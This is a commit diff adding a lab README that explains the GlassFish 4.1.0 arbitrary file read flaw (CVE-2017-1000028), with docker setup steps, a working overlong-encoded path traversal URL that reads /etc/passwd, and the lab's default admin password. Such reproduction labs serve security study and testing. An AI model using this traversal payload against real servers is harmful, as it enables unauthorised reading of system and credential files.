first commit

2025-09-06 16:08:15 +08:00
commit 63285f61aa
2624 changed files with 88491 additions and 0 deletions
--- a/glassfish/CVE-2017-1000028/README.md
+++ b/glassfish/CVE-2017-1000028/README.md
@@ -0,0 +1,36 @@
+# GlassFish 4.1.0 Arbitrary File Read (CVE-2017-1000028)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+GlassFish is an open-source application server for the Java EE platform. A vulnerability in GlassFish allows attackers to read arbitrary files through UTF-8 Overlong Encoding attack.
+
+The vulnerability exists because GlassFish does not properly handle UTF-8 Overlong Encoding when decoding URLs. As a result, `%c0%ae` is decoded as the ASCII character `.` (dot). By using `%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/` in the URL, an attacker can traverse directories and read arbitrary files on the system.
+
+References:
+
+- <https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904>
+- <https://www.leavesongs.com/PENETRATION/utf-8-overlong-encoding.html>
+
+## Environment Setup
+
+Execute the following command to start a GlassFish server 4.1:
+
+```
+docker compose up -d
+```
+
+After the server starts, you can access GlassFish Admin Console on `http://your-ip:4848`.
+
+## Vulnerability Reproduction
+
+Visit the following URL to read the contents of `/etc/passwd`:
+
+```
+https://your-ip:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
+```
+
+![](1.png)
+
+### Additional Notes
+
+The super administrator password is set in `docker-compose.yml`, with a default value of `vulhub_default_password`. You can use this password to log in to the admin account on port 4848.